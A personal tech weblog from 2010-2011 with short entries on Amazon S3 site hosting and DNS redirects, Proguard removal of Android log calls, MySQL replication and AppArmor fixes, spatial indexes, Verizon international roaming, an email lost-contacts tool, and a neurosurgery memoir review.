Joseph Barillari's weblog

Core dumped.

04 April 2011


If you hack Scala in Emacs, you must try ENSIME. The sbt-shell mode alone is worth the price of admission.

23 February 2011

Why you *can't* run your website from Amazon S3 (at least, not entirely)

A few days ago, I saw a blog post by Amazon CTO Werner Vogels: "New AWS feature: Run your website from Amazon S3." I wanted to set up a static website at and thought this would be a great way to do it.

After uploading my files to S3, I edited my DNS settings. I tried adding a CNAME record to point to For some reason, GoDaddy refused to let me do this. Googling eventually led me to this page, which explained that RFC 1034 prohibits creating a CNAME for the root of a domain. In other words, while I could point to S3, I couldn't point to S3. I would have to set up a server somewhere to server redirects from to

I'm not the first to post about the root CNAME issue: there are some comments about it on Dr. Vogels's initial post, and even a reply from Dr. Vogels where he tells a reader to "redirect {mysite}.com to www.{mysite}.com." (How is the user supposed create a redirect using only S3? Read on.)

Less than 12 hours ago, Dr. Vogels followed up with a new post, "Free at Last - A Fully Self-Sustained Blog Running in Amazon S3." He explains that by switching to Disquis for comments and Bing for search, he was able to move his blog entirely to S3.

Entirely? How did he solve the redirection problem? Let's see:

$ host has address mail is handled by 10 mail is handled by 10

Whom does that address belong to?

$ whois 'n'
# The following results may also be obtained via:

NetRange: -
NetHandle: NET-74-208-0-0-1
Parent: NET-74-0-0-0-0
NetType: Direct Allocation
NameServer: NSA2.1AND1.COM
NameServer: NSA.1AND1.COM
Comment: For abuse issues, please use only
RegDate: 2006-11-22
Updated: 2009-08-12

It doesn't look like belongs to S3. Let's see what happens when we connect:

$ telnet 80
Connected to
Escape character is '^]'.

HTTP/1.1 200 OK
Content-Length: 79640
Content-Type: text/html
Last-Modified: Thu, 24 Feb 2011 02:21:34 GMT
Accept-Ranges: bytes
ETag: "af7bb38ec9d3cb1:447"
Server: Microsoft-IIS/6.0 <--- Definitely not S3
X-Powered-By: ASP.NET
Date: Thu, 24 Feb 2011 06:43:43 GMT

It looks like still points to Dr. Vogels's old server. If you go to, however, the site is indeed served from S3:

$ telnet 80
Connected to
Escape character is '^]'.

HTTP/1.1 200 OK
x-amz-id-2: JycRZ0LH9NSGYyM6A+B24cSpSs5AsMUTH8wn95OoVwnOcrDQ/Q2/xbcldydB+IGQ
x-amz-request-id: 18BBB3B91F04D1B6
Date: Thu, 24 Feb 2011 06:50:53 GMT
Cache-Control: no-cache
Last-Modified: Thu, 24 Feb 2011 02:25:20 GMT
ETag: "000d8cb6f9e84d4012aaa0739c48038d"
Content-Type: text/html
Content-Length: 79640
Server: AmazonS3

What does this mean? It means that there is still one final dependency if you want to serve your site from S3. Unless you want to ignore users who go to {mysite}.com instead of www.{mysite}.com, you need a web server that redirects users from {mysite}.com to www.{mysite}.com. Apache's mod_rewrite can do this. In fact, the manual for mod_rewrite even provides an example of how to do exactly that.

A generously-minded individual (or AWS) could even set up one redirection server for everyone who wanted to host their second-level domain in S3. Those who wanted to host their sites in S3 could just point the root A record for their domain to the redirector, which could be an Apache server with a mod_rewrite configuration that looks something like this:
RewriteCond %{HTTP_HOST}   ^[^.]+\.[a-z]+$ [NC]
RewriteRule ^/?(.*) http://www.%{HTTP_HOST}/$1 [L,R=301,NE]
[I haven't tested this and am not an Apache expert, so please let me know if you can't perform %{variable} substitution in a RewriteRule.]

Until such a service exists, you will still need an HTTP server elsewhere in order to host your entire site in S3.

[How did I solve this issue? I avoided it. I put the content in EBS and served it from an EC2 instance. I use EC2 for other projects and have always been pleased with it.]

Update: See Dr. Vogels's response in the comments.

21 February 2011

Great title, poor execution

I saw this article earlier today:

It turns out that being "kicked out of Y Combinator" was less dramatic than I thought. I was kind of expecting the author would describe having his epaulettes hipster goatee ceremoniously torn off, his iPad shattered, his Twitter account cancelled, his Posterous background replaced with Goatse, and being stripped to his undershorts, rolled in honey and feathers, and dumped just outside the border of Mountain View.

29 January 2011

Troubleshooting mysql replication

PROTIP: When you're stuck on "Waiting to reconnect after a failed master event read" or some other equally unhelpful error message, start the slave mysqld on the console. You'll get much more useful error mesages that Ubuntu appears to be to be filtering from syslog, like:

110130 0:41:25 [ERROR] Error reading packet from server: Access denied; you need the REPLICATION SLAVE privilege for this operation ( server_errno=1227)

PROTIP 2: Note that the replication will start as soon as you fix the problem, so you might want to run it using 'screen' so you can wait for an opportune time to kill the slave mysqld and restart it using /etc/init.d/mysql start or start mysql or whathaveyou.

Sharing EBS snapshots on EC2

If you want to share an EBS volume snapshot on EC2 with another account the Amazon documentation explains how: find the account number of the target account, right-click the snapshot on the management console, choose permissions, and add the account number. What the instructions don't say is that you can't actually create a volume from that snapshot on the target account---it won't show up on the list. You have to use the command-line tool ec2-create-snapshot.

03 January 2011

Excising android.util.Log calls when you publish your Android app

The Android platform includes support for debuggers, but since real programmers don't use debuggers (and because I'm not using Eclipse), I use the equivalent of printf: android.util.Log to follow what's going on in my programs

Because there's no macro processor in Java (or Scala, which I'm actually using), there are two standard ways to remove debugging statements from your code before you ship it:

  1. Prefix every call to the logging function with an if statement:
    if (GlobalConstants.DEBUG) Log.v(GlobalConstants.LOG_TAG, "isBetterLocation(): isSignificantlyNewer->ret true")
    A Makefile (or whatever your build system) can set GlobalConstants.DEBUG appropriately. This is regrettably verbose.* It also doesn't actually eliminate the code: maybe the Scala compiler isn't optimizing hard enough, but when I disassemble the class files (actually, the dex files), they're still there, wasting precious bytes, even though they never will be called.**

  2. Tell Proguard to eliminate the calls to logging functions with a configuration directive like:
    -assumenosideeffects class android.util.Log {public static int v(...);public static int d(...);public static int w(...);public static int i(...);}

    Since I'm running Proguard anyway (the Scala Build Tool Android plugin runs it by default), this would seem to be the best way.

The only problem was that Method #2 didn't work. I tried loads of variants on the class specification for -assumenosideeffects, but the Log statements kept showing up in the code.

It turned out that there were no less than two reasons why it wasn't working.

The first was that the scala-build-tool Android plugin had switched off Proguard's optimization by adding the -dontoptimize switch in AndroidProject.scala:

def proguardTask = task {
val args = "-injars" :: mainCompilePath.absolutePath+File.pathSeparator+
(if (!proguardInJars.getPaths.isEmpty)"(!META-INF/MANIFEST.MF)").mkString(File.pathSeparator) else "") ::
"-outjars" :: classesMinJarPath.absolutePath ::
"-libraryjars" :: libraryJarPath.getPaths.mkString(File.pathSeparator) ::
"-dontwarn" :: "-dontoptimize" :: "-dontobfuscate" :: // <------ ROFL "-keep public class * extends" :: "-keep public class * extends" :: [definition continues ...]

Fortunately, that was easy to fix once I knew what to look for. I copied proguardTask into the MainProject class of my project/build/MyProjectName.scala project definition file, slapped on an override, and deleted the offending "-dontoptimize" (and "-dontobfuscate", too).

Despite that fix, Proguard still wouldn't erase the Log calls. Casting around for the second reason (and wondering why I didn't just solve this problem with a few calls to sed in a Makefile), I unzipped the generated .apk and disassembled the classes.dex file with dedexer. Inside was code like this:

sget-object v1,com/mycode/android/GlobalConstants$.MODULE$ Lcom/mycode/android/GlobalConstants$;
invoke-interface {v1},com/mycode/android/GlobalDebugState/DEBUG ; DEBUG()Z
move-result v1
if-eqz v1,l1d01c
sget-object v1,com/mycode/android/GlobalConstants$.MODULE$ Lcom/mycode/android/GlobalConstants$;
invoke-virtual {v1},com/mycode/android/GlobalConstants$/LOG_TAG ; LOG_TAG()Ljava/lang/String;
move-result-object v1
const-string v2,"clickTakePicture: erasing picture..."
invoke-static {v1,v2},android/util/Log/v ; v(Ljava/lang/String;Ljava/lang/String;)I
move-result v1
invoke-static {v1},java/lang/Integer/valueOf ; valueOf(I)Ljava/lang/Integer;
(code continues...)
Note that after the call to Log.v, the program is doing something with the result of that function: it's calling valueOf on the result. Why on earth is it doing this?

My guess was that it had something to do with the fact that the if statement in Scala is also an expression: it evaluates to the value of the last expression in the code block it executed. So you can write the following:

scala> 3 + (if (1>2) 5 else 6)
res0: Int = 9

I hypothesized that the Scala compiler was keeping the result of the Log.v function call around so that if (GlobalConstants.DEBUG) would be able to return a value. Now, it shouldn't have done so, because I wasn't actually using the if expression. Call this a bug in Scala. Proguard, noticing that the program was doing something with the return value of Log, refused to optimize it away.

On that hunch, I tried removing all of the if (GlobalConstants.DEBUG) conditionals. The Log statements disappeared. Success!

Well, not quite. Because every code block in Scala evaluates to the value of the last expression evaluated inside that block, there were code blocks where the call to Log was the last such call. For instance, this case, where I was using pattern matching as flow control but ignoring the return value of the match:

mevt.getAction match {
case x:Int if x == MotionEvent.ACTION_DOWN || x == MotionEvent.ACTION_MOVE => {
mLastTB = topBottomNeither
mLastY = mevt.getY
Log.v(SQConstants.LOG_TAG, "onTouchEvent started new state:" + mLastTB + " mevtY:" + mLastY)
case _ => null

To get the Scala compiler to discard the return value from that Log.v, I inserted a null after it, as the last expression in the case x... block above. Success!

Well, not exactly. Now my code is peppered with unnecessary nulls (or any literal). I should track down the offending bug in Scala, but I think I've sunk enough time into this one already.) And, to make matters worse, -assumenosideeffects eliminates the function calls but won't optimize away any expressions in the arguments to the log functions: e.g., if you have the line:

Log.v(Constants.LOG_TAG, " NPT.before() called on ctx:" + context);

You get this (completely unused) computation in the output:

.line 623
new-instance v0,scala/collection/mutable/StringBuilder
invoke-direct {v0},scala/collection/mutable/StringBuilder/ ; ()V
const-string v1," NPT.before() called on ctx:"
invoke-virtual {v0,v1},scala/collection/mutable/StringBuilder/append ; append(Ljava/lang/Object;)Lscala/collection/mutable/StringBuilder;
move-result-object v0
invoke-virtual {v0,v8},scala/collection/mutable/StringBuilder/append ; append(Ljava/lang/Object;)Lscala/collection/mutable/StringBuilder;
move-result-object v0
invoke-virtual {v0},scala/collection/mutable/StringBuilder/toString ; toString()Ljava/lang/String;

[note that you have to turn off obfuscation to see the actual method and object names]

We could tell Proguard to assumenosideeffects for scala.collection.mutable.StringBuilder, but then it might optimize away .append calls that we do want. What would be ideal would be if we could tell Proguard that calls on the StringBuilder object had no side effects except on that object itself, so that it could notice that the object was never used and delete it. This is really the sort of thing a compiler should do, though---all the more reason why it would be ideal if a construct like

if(GlobalObject.DEBUG) whatever()

...would be dropped by the compiler if GlobalObject.DEBUG were declared both false and final.

Conclusion: short of hacking a macro processor (read:sed, because I'm lazy) into the build process, there's no easy way to conditionally and completely excise those debugging statements. I'm going to leave them. Users won't see them, but they will take up (a negligable amount of) space and waste (a negligable number of) cycles.

* Famed hacker Jamie Zawniski had this complaint decade ago. A StackOverflow poster notes that, to this day, #ifdefDEBUG is still hard to simulate in Java.

** Computer storage may be infinite, but mobile phones are small and wireless connections are slow.

16 December 2010

"Incorrect string value"

If you see an "Incorrect string value" error in Django and you're using MySQL, run


and check the CHARACTER_SET_NAME for the column in question.

If it's not set correctly (e.g., it's latin1 and you're trying to insert utf8), change it with

alter table table modify column type character set utf8;

Restarting e16 if you can't use the menu

I use the enlightenment window manager, largely because I'm used to it. E16 is pretty stable, but sometimes it gets wedged and needs to be restarted. Fortunately, E retains its state between restarts. Just Mouse-3 the desktop and pick "Restart Enlightenment".

But what if E is so wedged that you can't middle-click the desktop? Suppose, say, the alt-tab menu is on the screen, hogging the focus, and won't go away? You could just kill E, but then you'd have to reopen and reposition all of your windows again.

Solution: ctrl-alt-f1 to a virtual console, log in, and run eesh, the command-line interface to Enlightenment. Like this:

$ env DISPLAY=:0 eesh

07 December 2010

PROTIP: X11 fixed font failure

This is the first good explanation I've seen of the infamous X11/vnc error:

Fatal server error:
could not open default font 'fixed'

16 November 2010

PROTIP (for nerds)

If you're not running anything on port 443, forward it to 22. That way, if you find yourself stuck behind a fascist firewall*, you can still ssh to your personal machine.

* like the one on megabus

11 November 2010

google = win. ec2.micro+ubuntu+openjdk= fail.

I tried to install OpenJDK on an Amazon EC2 micro instance. The terminal stopped echoing. The machine wasn't taking new ssh connections. I checked the system log---a kernel panic! Charming. I rebooted. Same deal. I stopped the instance and brought it up a few seconds later, thinking it might send me to a new dom-0 host. Tried the install again. Nope, same issue.

Then I typed "ec2 micro kernel panic" into Google. Third hit:

William's Blog | Like running with scissors, only more dangerous

Apparently installing OpenJDK using apt-get on Ubuntu 10.04 on an AWS EC2 Micro instance causes a kernel panic. I don't know why, and apparently neither ...

Here's the official bug report. The problem has something to do with the VM system. The workaround is to boot any other kind of instance (say, small), install java on that, then shut it down, change it to micro, and boot it. My workarounds would be to use another JRE like cacao or jamvm (too bad neither of them successfully runs the Google Closure Compiler, which was the point of putting Java on the micro instance), or just do the compilation elsewhere.

Hey, at least Google still works.

29 October 2010

Thinking before typing (MySQL spatial indices gotcha)

"SQL, Lisp, and Haskell are the only programming languages that I’ve seen where one spends more time thinking than typing." --Philip Greenspun

MySQL, I just learned, has a geometry data type and supports R-tree indices, which could be very helpful for a new project I'm exploring. I wanted to combine a geometric lookup with a temporal lookup, but discovered that the naive way of doing so has some pitfalls.

Here was idea #1:

create table gt4 (g point not null, t datetime not null, spatial index(g), index(t), index(t,g));

If I put a few sample values into that table:

insert into gt4 (g,t) values (GeomFromText('Point(8 8)'), '2008-01-01 11:55');
insert into gt4 (g,t) values (GeomFromText('Point(81 80)'), '2009-01-01 11:55');
insert into gt4 (g,t) values (GeomFromText('Point(1 0)'), '2008-01-01 11:55'); worked as expected:

> select t, AsText(g) from gt4 where MBRContains(GeomFromText('Polygon((0 0, 31 0, 31 16, 0 16, 0 0))'),g);
| t | AsText(g) |
| 10 | POINT(8 8) |
| 10 | POINT(1 0) |
2 rows in set (0.00 sec)

But, if I were to make a very small change---which is to say, reversing the arguments of the last index()...

create table gt5 (g point not null, t datetime not null, spatial index(g), index(t), index(g,t));

If we reinsert the same values, things seem to work:

insert into gt5 (g,t) values (GeomFromText('Point(8 8)'), '2008-01-01 11:55');
insert into gt5 (g,t) values (GeomFromText('Point(81 80)'), '2009-01-01 11:55');
select t, AsText(g) from gt5 where MBRContains(GeomFromText('Polygon((0 0, 31 0, 31 16, 0 16, 0 0))'),g);
| t | AsText(g) |
| 2008-01-01 11:55:00 | POINT(8 8) |
1 row in set (0.00 sec)

But if we add that last row...

insert into gt5 (g,t) values (GeomFromText('Point(1 0)'), '2009-01-01 11:55');

Then select...

> select t, AsText(g) from gt5 where MBRContains(GeomFromText('Polygon((0 0, 31 0, 31 16, 0 16, 0 0))'),g);
Empty set (0.00 sec)

Say what?

MySQL uses a different index in each case. For table gt4, it picks the spatial index:

mysql> show create table gt4\G
*************************** 1. row ***************************
Table: gt4
Create Table: CREATE TABLE `gt4` (
`g` point NOT NULL,
`t` int(11) DEFAULT NULL,
SPATIAL KEY `g` (`g`),
KEY `t` (`t`),
KEY `t_2` (`t`,`g`(25))
1 row in set (0.00 sec)

mysql> explain select t, AsText(g) from gt4 where MBRContains(GeomFromText('Polygon((0 0, 31 0, 31 16, 0 16, 0 0))'),g)\G
*************************** 1. row ***************************
id: 1
select_type: SIMPLE
table: gt4
type: range
possible_keys: g
key: g
key_len: 34
ref: NULL
rows: 2
Extra: Using where
1 row in set (0.00 sec)

Whereas for gt5, it uses the combined index:

mysql> show create table gt5\G
*************************** 1. row ***************************
Table: gt5
Create Table: CREATE TABLE `gt5` (
`g` point NOT NULL,
`t` datetime NOT NULL,
SPATIAL KEY `g` (`g`),
KEY `t` (`t`),
KEY `g_2` (`g`(25),`t`)
1 row in set (0.00 sec)

mysql> explain select t, AsText(g) from gt5 where MBRContains(GeomFromText('Polygon((0 0, 31 0, 31 16, 0 16, 0 0))'),g)\G
*************************** 1. row ***************************
id: 1
select_type: SIMPLE
table: gt5
type: range
possible_keys: g,g_2
key: g_2
key_len: 27
ref: NULL
rows: 1
Extra: Using where
1 row in set (0.00 sec)

The documentation explains that combined indices concatenate the columns together. Apparently, this doesn't play nicely with geometry queries.

17 October 2010

International roaming with Verizon Wireless

Verizon Wireless's may have the best coverage in the U.S., but, regrettably, its handsets use a radio technology that hasn't caught on in most of the world. In most foreign countries, it's impossible to roam with a Verizon CDMA handset. I wanted to continue to receive email on my phone while abroad for a few weeks. Options included buying a GSM phone before I arrived and purchasing local SIM cards, buying a GSM phone in-country and purchasing local SIM cards, or buying a global phone and a global data plan from AT&T. Happily, just before I left I happened upon a Verizon program designed exactly for this: the GlobalEmail program coupled with the amazingly under-advertised Global Travel program.

GlobalEmail gives you flat-rate unlimited data plan while traveling. Global Travel loans you a handset that works abroad. Verizon markets a small number of phones that include both GSM and CDMA radios. In the Global Travel program, they will FedEx you one for your trip which you return after arriving back in the U.S. You can keep your number, so there's no need to set up call forwarding, as you would if you bought foreign SIM cards. (Google Voice won't forward to international numbers, but I assume that there exist paid services that will.) Voice calls are quite expensive ($2/min and up for all but a small handful of countries), although Verizon offers a roughly 20% discount if you pay an extra $5 per month. I might have had to take a long call or two, so I opted for this.

Unfortunately, none of Verizon's global phones run Android. I received a Samsung Saga, which runs Windows Mobile 6.1. The Saga was a candybar-format phone with an amazing array of input methods: a physical keyboard, a touchpad that toggled between moving a mouse cursor and scrolling through interface widgets, and a touchscreen supporting both stylus and (imprecise) fingertip input. The phone was never quite as easy-to-use as the Droid with its paltry two input methods (keyboard and fingertip touchscreen). The UI was also not as slick. I never got the hang of scrolling in large web pages. But it was certainly serviceable: I managed to book lodging, read news, answer email, send and receive Google Voice SMS messages, and even make the occasional phone call.

The chief inconvenience of the program was setting up the phone. Microsoft's email client was a bit under-documented. I had to Google to learn that to override the default ports for mail transport, one had to use server:port notation. Mail-checking and web-surfing were noticeably slower than they were on the Droid, although this may have been a function of the networks I used (mostly Vodafone). I ran into a surprising number of total dead spots, most of which were along train routes in Greece.

Some warts included the USB cable, which confusingly deactivated the phone' radio when I plugged it into a Windows machine. The GPS module didn't feed data to Google Maps (or maybe I never set it up properly), so I was usually stuck with "your location within 500 meters" reports. The built-in browser did not identify itself as (or perhaps Wikipedia did not notice it as) a mobile browser, so Wikipedia sent me to its bandwidth-hogging conventional site instead of its bandwidth-sipping mobile site, as it would on the Droid. Battery life was miserable, but no worse than it was on the Droid. (An unfair comparison: I have far more background monitoring processes running on the droid.) It was really hard to scroll large web pages: switching to mouse mode and click-dragging with the cursor seemed to work, but if a page got stuck reloading, you would have to wait a while.

The good: Very light. Nice form factor---you can use the physical keyboard and even dial one-handed and perhaps without looking at the phone. Worked as advertised. I sent 114 messages with the phone.

The bad: Confusing input methods. Occasionally sluggish UI. Took ages to set up two email accounts. Non-working (or very well-hidden) GPS. No compass, so Google Maps showed my location as a dot, not as an arrow.

The strange: A tiny mirror on the back of the phone, perhaps for composing self-portraits with the camera.

If you're a Verizon customer and are visiting a GSM country, this program is highly recommended. If you plan to travel to GSM countries often, however, it may be worthwhile to buy a global phone and keep it, to avoid having to set-up the phone each time.

10 September 2010

The Incredible Shrinking Android

I've been porting the forget-me-never app to Android. To avoid reinventing the wheel, I copied its mail-account-configuration and mail-fetching functions from k9mail. They worked just fine, except for one odd problem: when I used the account-configuration wizard, every time I advanced from screen to screen, the widgets got smaller and smaller. If I toggled back and forth between two pages, I could get them to shrink to the point where the text was completely unreadable.

Strangely, this only happened on the Droid -- it didn't happen in the emulator. (One difference might be that the emulator was running Android 2.0.1 and the Droid was running 2.2.)

I isolated the offending code by the time-honored technique of shotgun debugging: removing everything from the program until the problem went away, then adding thing until I found the culprit. I had thrown away just about everything when I landed on this code in

public void onCreate(Bundle icicle, boolean useTheme)
setLanguage(this, K9.getK9Language());
if (useTheme)

// Gesture detection
gestureDetector = new GestureDetector(new MyGestureDetector());


Commenting out setLanguage fixed the problem. That was odd, I thought, what would i18n have to do with screen scaling? Here's setLanguage:

public static void setLanguage(Context context, String language)
Locale locale;
if (language == null || language.equals(""))
locale = Locale.getDefault();
else if (language.length() == 5 && language.charAt(2) == '_')
// language is in the form: en_US
locale = new Locale(language.substring(0, 2), language.substring(3));
locale = new Locale(language);
Configuration config = new Configuration();
config.locale = locale;
The last line is the key. It appears to retrieve a DisplayMetrics object from the context (whatever is subclassing K9Activity, in this case) and then passes it back to the context a second time. Somewhere in that reapplication, a scaling factor is getting applied iteratively, because each time a new actvitiy opens, onCreate gets invoked and the widgets get smaller.

I don't know if this is a bug in the k9mail trunk or just an odd interaction with my phone---I'm using an older version of k9mail that I patched for my purposes and am disinclined to replace it just to test this.

08 August 2010


I have fourteen years of saved email -- about 290,000 messages. Most of this is useless junk: bulk mail, long-expired announcements, reminders about bills or bank statements, mailing lists, error messages, and spam. But buried in that muck is almost all of my online correspondence since 1996.

Accordingly, that message store can answer important questions. The one I have in mind is: Who did I used to talk to? Who have I fallen out of touch with?

Superficially, this is simple: just write a program to list everyone whom I've emailed and who has emailed me back (or vice versa). Sort them by the date of last contact, let me filter by the number of messages.

That's the C- approach. A better solution would acknowledge that people use different email addresses. Multiple-emails-per-person creates two complications, one minor and one major. The minor complication is that some people will appear in the list multiple times, once for each address. A bigger deal is that some people will get lost. If I only exchange one or two pieces of email with someone (for instance, because we were in a class together and tended to talk in person), but from different addresses, that approach will miss it entirely. I write to He responds from The naive approach above won't connect those two messages.

Fortunately, email headers often contain names as well as addresses: "Lyndon Johnson ." If you consolidate addresses with the same name or similar names (e.g., normalize "Johnson, Lyndon B." and "Lyndon Baines Johnson" to "Lyndon Johnson"), you might be able to group addresses by person. I implemented another C- solution: it works, but it asks the user about each potential merge. Unfortunately, the low-frequency addresses that you want are also intermixed with spam, so it will take a little while to say "yes" or "no" to each one if your mail store has a fair bit of spam in it -- as mine does. I'll implement a fix for this (perhaps a spam filter) at some point.

I put this together, building on top of my college pal Mihai's super-cool Mail Trends. Here's what it looks like:

You can set the minimum days since the last message observed, minimum messages from, and minimum to. You can also hide an entry for a month, three months, a year (if you want to be reminded to contact someone, but not just yet), or forever (to filter out mail from, say, your cable company help desk).

The system is a bit like etacts, but it isn't hosted---everything lives on your personal computer. (I'm pretty paranoid about email and don't like the idea of a random company having access to it, regardless of how trustworthy they may be. All of the code in this system is open-source, so you can see what it does for yourself.)

Right now, this is strictly nerd-ware: you will need to know a fair bit about basic Un*x tools and possibly a bit of Python programming to get it to work. If the response is positive, I can certainly put together a nicely-packaged version. I think it would make a nice mobile-phone app (so it can remind you "hey, it's been six months since you've talked with x").

If you would like to try it, here's how. Open a shell prompt. (On Windows, you will probably need Cygwin.)

1) Install Python 2.6 (or 2.7) and the Cheetah template language and (optionally) the CherryPy web development system, version 3. On a Debian/Ubuntu-based system, you should be able to just type:
$ sudo apt-get install python-cheetah python2.6 python-cherrypy3

2) Download mail-trends-lost-contacts.tar.gz. (If you prefer, you can also download mail-trends and apply my patch instead.)

3) Run the program. If you use Gmail, the command will be something like:

python2.6 --use_ssl, --skip_labels

Be sure to replace with your actual address and list all of the addresses from which you send or receive mail under --me=, separated with commas. (If you don't list them, the program can't figure out which messages are actually from or to you.

If you use a non-Gmail imap server, the command is slightly different:

python2.6,, --use_ssl --username=YOUR_IMAP_USERNAME --skip-mailboxes=spam,trash

Instead of specifying --skip-mailboxes=, you can also specify --include-mailboxes=, which will include only the mailboxes listed.

If you want to try the address-consolidation feature (which will ask you lots of questions), add the option --interactive-disambiguation. If you want to use the "remind me in x days" feature, add the option "--web-server=10000", where 10000 is the port on which to run the web server.

To use the system, go to in your browser (if you used the --web-server option, setting the port appropriately) or open the file out/index.html (if you didn't use that option).

Enjoy. Let me know what you think.

16 July 2010

More running fail

I had a nice course sketched out --- 5,000 m, so I could feel like I was back in high school again (albeit more out of shape. Lol old age):

Regrettably, the stairway on the Boston side of the river was closed, so I had an unexpected detour through BU. (Which was already holding an orientation. School starts early, I guess.)

13 July 2010

Lol smoothing

This is the route that Google's otherwise great My Tracks said that I ran today:

Note that I did not actually run from Watsontown, PA to Midville, PA in 23 and a half minutes.

PROTIP: Just before you hit "Record" in My Tracks, be sure to use GPS Status (another free Android Market download) to make sure you have a GPS fix first.

12 July 2010

Two residency biographies

Frank Vertosick. When The Air Hits Your Brain: Parables of Neurosurgery. Fawcett, 1988.

Katrina Firlik. Another Day in the Frontal Lobe: A Brain Surgeon Exposes Life on the Inside. Random House, 2006.

Drs. Vertosick and Firlik wrote remarkably different books about the same subject: their neurosurgery residency. Both trained in the same system: the University of Pittsburgh Medical Center, separated by 14 years. Vertosick finished in 1988, whereas Firlik finished in 2002.

Vertosick's book is a series of case anecdotes from his training, interspersed with some reflections on the profession. Firlik's book includes a handful of case anecdotes, but the bulk of the text is expository rather than narrative. Item: Firlik discusses the dangers of misdiagnosing dementia as Alzheimer's or old age when it could be a tumor or normal-pressure hydrocephalus. Vertosick describes a case of "rolling out" a "big, juicy" meningioma in a patient most everyone but her surgeons thought was hopelessly demented. She made a full recovery. Item: Firlik describes the sophisticated skull-drills that stop running as soon as the bone is drilled through. Vertosick relates the first neurosurgical case he observed, where the junior resident cheerfully explained that the clutch that stops the drill before it hits brain tissue -- then screamed curses and hustled Vertosick out of the room as the drill unexpectedly pierced straight through the skull and into the patient's brain.

For would-be patients, Firlik's book is undoubtedly the better of the two. The worst of the fratboy joshing that Firlik mentions is a pinup poster. In Vertosick's book, the high-water mark comes when Fred, the chief resident, "steals" a case from Gary, a senior resident: he performs the entire operation himself, then leaves Gary the ignominious task of closing the wound. Gary contents himself by carving "Fred Sucks" on the inside of the patient's skull---where he expected no-one would ever see it. Unfortunately for all parties, the patient developed an infection and the bone flap had to be removed, leaving Fred red-faced and screaming as he saw the "skull-o-gram." It's not the book one would give grandpa before spine surgery.

I preferred Vertosick's "case anecdotes with minimal filler" approach. Vertosick never discusses his childhood. Firlik confesses to being a bit of a neat freak. As a child, her belongings were meticulously organized; she even fantasized about being a cleaning lady. She describes a first-date with her over Indian food, her desire for an outdoor lifestyle, her pity for those with desk jobs. Vertosick never mentions what he does outside the hospital. Firlik relates her interests in Japanese language, food, culture, packaging, and architecture.

Item: Dr. Firlik shares a pizza with her husband in a tony Italian restaurant, then being paged and rushing off to see a patient with a stroke and skyrocketing intercranial pressure. Her husband, also a neurosurgeon (but one who left the practice to be a venture capitalist) calmly boxes up the food as she rushes to the hospital. Vertosick shares a pizza with Gary the senior resident in a cheap dive by the medical center (the latter takes half the pizza, folds it on itself, and begins chewing), then is interrupted by a car crash and spinal trauma.

Significant others do not enter into Vertosick's memoir except in passing. Firlik met her husband in college and had been married to him for over ten years. Perhaps Firlik's story is the more unusual of the two: a friend told me that one of his neurosurgery-residency interviewers advised him to pick his residency carefully, "since it will last longer than your first marriage."

While Vertosick may have omitted the details of his life, he describes the psychological hardening effect of surgical training. The lengthiest introspective segment in Vertosick's memoir is one such instance: operating to clip an aneurysm, he slips, punctures the vessel, leaving the patient a vegetable. He calls Gary, now long-since departed for to another hospital, who chain-smokes and tells him that if he's going to feel sorry for himself, he should hang up his mask, sit by a phone, and hand off patients to other brain surgeons. Firlik doesn't relate such a mistake (perhaps she, via luck or skill, avoided them), but does describe the emotional anguish of telling a young patient he had terminal cancer.

Firlik's book would be most appropriate for reassuring patients about the basics of neurosurgery or reassuring prospective physicians about the possibility of being a brain surgeon yet still having a life. Vertosick's book would likely disabuse prospective physicians of any such notion and would probably move all but the most desperate patients to stick with medical therapy. (As Gary tells Vertosick, "If the patient isn't dead, you can always make him worse.") For the interested non-patient/non-physician, the Vertosick's book comes with my highest recommendation.

04 July 2010

MySQL replication master-change gotcha

If you move the master server in your MySQL replication setup, you might be tempted to simply issue the command CHANGE MASTER TO MASTER_HOST=''; on the slave to point it to the new master.

If you do, the slave will lose its place in the log and you'll get errors from key conflicts as the slave tries to reinsert old rows. (Errors if you're lucky. The slave might just silently insert duplicate rows.)

Instead, issue a SHOW SLAVE STATUS\G; and use the values for Master_Log_File and Read_Master_Log_Pos (I think you want this rather than Exec_Master_Log_Pos, but they were equal in my case -- check the manual) to populate MASTER_LOG_POS and MASTER_LOG_FILE. In other words,


I screwed this up, but I was lucky enough to have just enlarged the volume, so I had an EBS snapshot of the last known good version of the slave. I just dumped the volume I'd broken and started from the snapshot. EC2+EBS ftw.

Debian->ubuntu mysql upgrade gotcha

If you're upgrading from Debian to Ubuntu, note that ubuntu wraps MySQL in app-armor and Debian doesn't. This means that if you played around with the paths that MySQL uses, mysqld might not be able to start at all.

The first thing to note is that you get no error notifications when "service mysql start" fails -- just an indefinite hang, as this thread notes. If you become root and run /usr/sbin/mysqld, you will get an error like this:

# /usr/sbin/mysqld
100704 19:41:08 [Warning] The syntax '--log_slow_queries' is deprecated and will be removed in MySQL 7.0. Please use '--slow_query_log'/'--slow_query_log_file' instead.
100704 19:41:08 [Note] Plugin 'FEDERATED' is disabled.
/usr/sbin/mysqld: Can't create/write to file '/tmp/ib17ii5f' (Errcode: 13)
100704 19:41:09 InnoDB: Error: unable to create temporary file; errno: 13
100704 19:41:09 [ERROR] Plugin 'InnoDB' init function returned error.
100704 19:41:09 [ERROR] Plugin 'InnoDB' registration as a STORAGE ENGINE failed.
100704 19:41:09 [ERROR] Unknown/unsupported table type: innodb
100704 19:41:09 [ERROR] Aborting

100704 19:41:09 [Note] /usr/sbin/mysqld: Shutdown complete

errno 13 means "permission denied."

Because I was using an Amazon EBS root filesystem, I wanted to eliminate unnecessary EBS overhead, so I'd moved /tmp to /tmp-old, made the directory /mnt/tmp on the local storage, and symlinked /mnt/tmp to /tmp. I thought the perms were correct, and I was able to make files in /tmp as an unprivileged user. I even ran vipw to edit /etc/passwd to give the mysql user a shell (otherwise, you can't su to mysql) and noted that it was possible to write files to tmp. (I changed it back to /bin/false afterwards, of course.) Even when I told mysql to use the old directory ( /usr/sbin/mysqld --tmpdir=/tmp-old), I got the same error message.

I dug through the init files and noticed some references to app-armor. I checked the logs and found this:

Jul 4 19:41:09 domU-12-31-39-0E-C9-A1 kernel: [ 8095.267321] type=1503 audit(1278272469.041:18): operation="mknod" pid=5746 parent=4609 profile="/usr/sbin/mysqld" requested_mask="c::" denied_mask="c::" fsuid=106 ouid=106 name="/mnt/tmp/ib17ii5f"


The main reason for redirecting /tmp was an application of my own that produced thousands of cache files in /tmp. I changed the app to use /mnt/tmp instead. Now, mysql launched, but with a new error:

SSL error: Unable to get certificate from '/vol/etc/mysql/newcerts/server-cert.pem'
